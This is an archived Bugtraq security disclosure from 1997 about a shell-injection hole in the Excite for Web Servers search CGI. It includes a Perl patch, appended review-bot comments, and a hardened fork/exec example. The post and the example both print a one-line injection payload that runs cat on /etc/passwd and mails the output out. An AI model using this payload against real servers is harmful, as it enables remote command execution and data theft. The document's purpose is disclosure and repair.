Bugtraq mailing list archives
CGI security hole in EWS (Excite for Web Servers)
From: marc_merlin () MAGIC METAWIRE COM (Marc Merlin)
Date: Wed, 17 Dec 1997 23:04:46 -0800
I tried a query like this one on a server where I was configuring: "this and this and that" (with the quotes) and noticed an error, so I looked at the code. Classic mistake, it launches a shell with whatever was given in the query (even though spaces are escaped with a '$'). Yet, the exploit remains simple:

";IFS="$";/bin/cat /etc/passwd|mail your_email_here;

(or any other shell command you can think of)

I found the problem on what I was told was EWS 1.1 (from what I was told, as I did not install it, but merely tweaked it). It's supposed to be from http://www.excite.com/navigate/

Here's a patch that fixes the problem in two places. (This library is typically in ews/ews/architext_query.pl.)

--- architext_query.pl 1997/12/09 00:30:13 1.4 +++ architext_query.pl 1997/12/12 21:25:31 1.7 @@ -223,8 +233,23 @@ ## do the search $timeout = "-to $maximum_query_time" if $maximum_query_time; + # Suppress backticks, newlines, dollar signs, carets, pipes, backslashes + # tilda, ampersand, semicolon, and star. Hope nothing is missing -- Marc + $query =~ s/\`//mg; + $query =~ s/\n//mg; + $query =~ s/\$//mg; + $query =~ s/\^//mg; + $query =~ s/\|//mg; + $query =~ s/\\//mg; + $query =~ s/\~//mg; + $query =~ s/\&//mg; + $query =~ s/\;//mg; + $query =~ s/\*//mg; + # Quote double quotes + $query =~ s/"/\\"/mg; $qcommand = "$queryprog -C $configfile $timeout -q \"$query\" -num $max_docs_to_return $syntax_flag"; $qcommand = &convert_file_names($qcommand); + #print "Command: $qcommand<BR>\n"; ## print $qcommand; if (open(QUERY, "$qcommand |")) { ## Accumulate the results.
@@ -585,8 +610,24 @@ $urledit = $form{'urledit'}; $timeout = "-to $maximum_query_time" if $maximum_query_time; + + # Suppress backticks, newlines, dollar signs, carets, pipes, backslashes + # tilda, ampersand, semicolon, and star. Hope nothing is missing -- Marc + $query =~ s/\`//mg; + $query =~ s/\n//mg; + $query =~ s/\$//mg; + $query =~ s/\^//mg; + $query =~ s/\|//mg; + $query =~ s/\\//mg; + $query =~ s/\~//mg; + $query =~ s/\&//mg; + $query =~ s/\;//mg; + $query =~ s/\*//mg; + # Quote double quotes + $query =~ s/"/\\"/mg; $qcommand = "$queryprog -C $configfile $timeout -q \"$query\""; $qcommand = &convert_file_names($qcommand); + #print "Command: $qcommand<BR>\n"; if (open(QUERY, "$qcommand |")) {

Note that this is what I found after a quick look, but other libraries may have similar bugs (like the architext.pl library, but it's not used on my system; it looks like junk left around in the Excite distribution (there are many such files)).

Marc

PS: Sorry, I can't follow the list too closely right now, so if you want to make sure I see your message, cc it to me (and if you mail me directly, replace "_" by "." between my first name and last name, as my spam filters can only redirect answers to my messages, not a new message written from scratch).

--
Home page: http://www.efrei.fr/~merlin/ (browser friendly)
Finger merlin () magic metawire com for PGP key (key id 763BE901)
***** "God is real, unless declared integer." *****
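Review bot: in the @@ -223,8 +233,23 @@ hunk the query is still handed to /bin/sh by `open(QUERY, "$qcommand |")`, so the fix rests on a character blacklist protecting a double-quoted string rather than on taking the shell out of the path; open the pipe with `open(QUERY, "-|")` and `exec` an argument list (`$queryprog, "-C", $configfile, "-q", $query, "-num", $max_docs_to_return`) instead, which makes the stripping unnecessary ($timeout then becomes the two elements `"-to", $maximum_query_time` rather than one interpolated string). Two further points in this hunk: the mail says spaces in the query are escaped as '$' before the search binary sees them, so if that happens before this point, `$query =~ s/\$//mg;` also deletes the encoded spaces and folds a multi-word query into one word, which should be confirmed against the rest of the file; and the comment should state that the order matters, since backslashes are removed before `"` is rewritten to `\"`, which is what keeps the escape from being undone.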
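Review bot: the @@ -585,8 +610,24 @@ hunk repeats the twelve substitutions from the @@ -223 hunk verbatim; move them into one subroutine (for example `&sanitize_query`) called from both places, so that a character added to the list later is not added in one spot and forgotten in the other, and have that routine reject the request rather than silently delete characters (a user searching for `C&A` currently gets results for `CA` with no indication why). Also drop the `#print "Command: $qcommand<BR>\n";` line instead of committing it commented out: uncommenting it later would echo the full command line, including $configfile, into the HTML sent to the browser.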
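As an added example, not code from the EWS distribution or from Marc's message, here is the shell-free way to run the search program that the patch's character stripping stands in for. The first routine reproduces the vulnerable pattern the mail describes; the second forks and execs an argument list, so the exploit string in the report reaches the binary as a literal query. The flags -C, -q, -num and -to are the ones visible in the patch; the paths for the search program and config file are assumptions.

```perl
#!/usr/bin/perl
# Added example, not code from the EWS distribution or from the mail above.
# The search binary path and config path are assumptions.
use strict;
use warnings;

my $queryprog  = '/usr/local/ews/bin/architextSearch';   # assumed path
my $configfile = '/usr/local/ews/ews/architext.conf';     # assumed path

# VULNERABLE: the pattern from the report. Perl passes the string to
# /bin/sh because it contains metacharacters, so a query such as
#   ";IFS="$";/bin/cat /etc/passwd|mail you;
# closes the -q argument and runs the attacker's commands.
sub run_query_unsafe {
    my ($query, $max_docs, $max_time) = @_;
    my $timeout  = $max_time ? "-to $max_time" : '';
    my $qcommand = "$queryprog -C $configfile $timeout -q \"$query\" -num $max_docs";
    open(QUERY, "$qcommand |") or die "cannot run $queryprog: $!";
    my @results = <QUERY>;
    close(QUERY);
    return @results;
}

# HARDENED: fork, then exec an argument list. No shell is involved, so
# quotes, semicolons, pipes and $ in $query reach the binary as ordinary
# bytes inside a single argv element and there is nothing to strip.
sub run_query_safe {
    my ($query, $max_docs, $max_time) = @_;

    # Defence in depth on the numeric flags and on the query itself.
    # Reject instead of silently deleting characters so the user learns
    # why a search failed. NUL is refused because execve() would truncate
    # the argument at it.
    die "bad max_docs\n" unless defined $max_docs && $max_docs =~ /^\d{1,4}$/;
    die "bad timeout\n"  if defined $max_time && $max_time !~ /^\d{1,4}$/;
    die "query too long\n" if length($query) > 256;
    die "query contains control characters\n" if $query =~ /[\x00-\x1f\x7f]/;

    # "-to 30" is two argv elements here, not one interpolated string.
    my @argv = ($queryprog, '-C', $configfile);
    push @argv, '-to', $max_time if $max_time;
    push @argv, '-q', $query, '-num', $max_docs;

    my $pid = open(my $fh, '-|');          # fork; child's STDOUT is our $fh
    die "fork failed: $!\n" unless defined $pid;
    if ($pid == 0) {
        # Block form forces execvp() with exactly this list, even if @argv
        # had one element, so Perl never reinterprets it as a shell line.
        exec { $argv[0] } @argv or do { warn "exec failed: $!\n"; exit 127 };
    }
    my @results = <$fh>;
    close($fh);                            # $? now holds the child's status
    return @results;
}

# The quoted phrase search from the report, then the exploit string from
# the mail; the safe version passes the latter to the binary as one
# literal -q argument instead of running cat and mail.
my @quoted  = run_query_safe('"this and this and that"', 10, 30);
my @exploit = run_query_safe(';IFS="$";/bin/cat /etc/passwd|mail me;', 10, 30);
```

The same `open(QUERY, "-|")` followed by `exec LIST` works with the bareword filehandle the original code uses, so the change fits into architext_query.pl without touching the result-reading loop; `&convert_file_names` would then be applied to the individual path elements of @argv rather than to the assembled command string.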
Current thread:
- CERT Advisory CA-97.28 - Teardrop_Land Aleph One (Dec 16)
- <Possible follow-ups>
- Re: CERT Advisory CA-97.28 - Teardrop_Land Charles M. Hannum (Dec 16)
- Re: CERT Advisory CA-97.28 - Teardrop_Land Alan Cox (Dec 16)
- Re: CERT Advisory CA-97.28 - Teardrop_Land Ron Holt (Dec 19)
- SGI Security Advisory 19971201-01-P1391 - statd(1M) Buffer Overrun SGI Security Coordinator (Dec 16)
- CERT Vendor-Initiated Bulletin VB-97.16 - CrackLib Aleph One (Dec 17)
- SNI-22: RADIUS Advisory Secure Networks Inc. (Dec 17)
- Re: SNI-22: RADIUS Advisory miguel a.l. paraz (Dec 17)
- CGI security hole in EWS (Excite for Web Servers) Marc Merlin (Dec 17)
- Re: CGI security hole in EWS (Excite for Web Servers) carson () tla org (Dec 18)
- Re: SNI-22: RADIUS Advisory Thom Henderson (Dec 18)
- mIRC Worm Aleph One (Dec 18)
- Re: mIRC Worm Nigel Reed (Dec 18)
- Re: mIRC Worm Paul Wilson (Dec 18)
- StackGuard: Automatic Protection From Stack-smashing Attacks Crispin Cowan (Dec 18)
- Re: StackGuard: Automatic Protection From Stack-smashing Attacks Tim Newsham (Dec 19)
- Re: StackGuard: Automatic Protection From Stack-smashing Attacks Theo de Raadt (Dec 19)
- Xotpcalc, version 1.0 Ivan Nejgebauer (Dec 19)
- Re: CERT Advisory CA-97.28 - Teardrop_Land Alan Cox (Dec 16)
- Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2) Alex Mottram (Dec 19)